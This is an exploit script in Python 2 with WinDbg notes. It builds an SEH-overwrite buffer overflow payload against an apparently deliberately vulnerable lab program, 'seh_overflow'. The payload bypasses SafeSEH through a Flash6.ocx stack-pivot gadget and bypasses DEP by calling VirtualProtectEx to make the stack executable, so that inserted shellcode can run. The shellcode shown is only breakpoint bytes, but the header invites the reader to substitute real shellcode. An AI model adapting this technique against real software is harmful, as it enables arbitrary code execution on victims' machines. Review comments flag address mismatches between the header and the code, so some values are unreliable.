# Name : Abhinav Thakur
# Email: [email protected]
# Description : This exploit takes advantage of a buffer overflow, bypassing DEP
# and SafeSEH, to hijack the control flow of the software
# application named 'seh_overflow' (in the seh_hardened directory)
# and eventually achieve arbitrary code execution.
# Game plan:
# 1. Overwriting the SEH function pointer.
# 2. Transferring code flow to the .code segment of the 'Flash6.ocx' module, which
# does not ensure 'SafeSEH' mitigation.
# 3. Calling VirtualProtect() to change memory protections on stack
# 4. Executing our shellcode on stack. Yay!!
# Useful info.
# 0:000> !exchain
# 0012ffb0: seh_overflow!_except_handler4+0 (00401835)
#
# 0012fb6c: Address of input buffer
#
# 0:000> ?12ffb0-12fb6c
# Evaluate expression: 1092 = 00000444
# 0x1008d3cb : Address of cc opcode in Flash6.ocx
# At the time of redirection of control flow to flash6.ocx -
# esp=0012f6c0
#
# Controlling esp
# add esp, X (add esp = 81 c4)
#
# 12f6c0 + X = 12fb6c (start of input buffer address)
# 12f6c0 + Y = 12ffc4 (safe end of user input buffer)
#
# 12ffc4 : address of return pointer
#
# 4ac < X < 904 (wiggle space is within our user-input buffer only)
#
# 0:000> s flash6 l94000 81 c4
# 0:000> u 1008e5fe
# Flash6!DllUnregisterServer+0x4361a:
# 1008e5fe 81c400060000 add esp,600h
# 1008e604 c3 ret return to 12fcc0
#
# Call to VirtualProtect() after stack pivoting; the stack should look like below -
#
# 7c801a5d <--- kernel32!VirtualProtectEx
#
# (windbg) !address
# 126000 - 13000 (size: a000) --> memory area PAGE_READWRITE.
#
# VirtualProtectEx Address = 0x7c801a5d # ESP points here after pivot
# Return address for VirtualAlloc = 12fb6c # return to our shellcode
# hProcessArgument = 0xffffffff
# lpAddressArgument = 0x126000
# dwSizeArgument = 0xA000
# flNewProtectArgument = 0x40
# lplOldProtectArgument = 13fd00
import struct
# Insert your shellcode in the 'shellcode byte array' and add 1 NOP after shellcode.
# As committed, the "shellcode" is four int3 (0xcc) bytes, so the script only
# demonstrates the control-flow hijack and traps in a debugger.
shellcode = ("\xcc\xcc\xcc\xcc")
# Payload layout, offsets relative to the start of the input buffer (the
# addresses and distances come from the WinDbg notes in the file header):
#   [0, 4)        4-byte NOP sled
#   [4, 340)      shellcode, NOP-padded so sled + shellcode is exactly 340 bytes
#   [340, 368)    7 dwords: the VirtualProtectEx call frame the pivot lands on
#   [368, 1092)   'C' filler up to the SEH record (1092 = 0x444, see header)
#   [1092, 1096)  next-SEH pointer (0xdeadbeef, never dereferenced)
#   [1096, 1100)  exception handler pointer -> 'add esp,600h ; ret' in Flash6.ocx
#   [1100, ...)   10000 trailing NOPs
# NOTE(review): this is Python 2 code. It concatenates str with the result of
# struct.pack, which is bytes on Python 3 and raises TypeError there.
payload = "\x90" * 4
payload += shellcode
payload += "\x90" * (340 - len(shellcode) - 4 )  # pad sled + shellcode region to 340 bytes
payload += struct.pack("I", 0x7c801a5d) # kernel32!VirtualProtectEx (per header; ESP lands here after the pivot)
payload += struct.pack("I", 0x0012fb6e) # Return to our shellcode (header lists 12fb6c; differs by 2 -- confirm which is intended)
payload += struct.pack("I", 0xffffffff) # hProcess (current process, per header)
payload += struct.pack("I", 0x00126000) # lpAddress (start of the PAGE_READWRITE region noted in header)
payload += struct.pack("I", 0x0000a000) # dwSize
payload += struct.pack("I", 0x00000040) # flNewProtect = 0x40 (PAGE_EXECUTE_READWRITE)
payload += struct.pack("I", 0x0012ff00) # lpflOldProtect (header lists 13fd00; code uses 0x0012ff00 -- confirm)
payload += "C" * (1092 - 340 - 28)       # 28 = the seven 4-byte dwords above
payload += struct.pack("I", 0xdeadbeef) # next pointer in list
payload += struct.pack("I", 0x1008e5fe) # exception function pointer
payload += "\x90" * 10000
# NOTE(review): '\m' is not a recognised escape, so the backslash is kept
# literally, but Python 3.12+ emits a SyntaxWarning for it. The file is opened
# in text mode ('w'), not 'wb'; on Windows that translates 0x0a to 0d 0a, so the
# written file is byte-exact only while no byte of the payload is 0x0a (true for
# the values above, not guaranteed for arbitrary shellcode).
fo = open('C:\mal_input_seh_hardened', 'w')
fo.write(payload)
fo.close()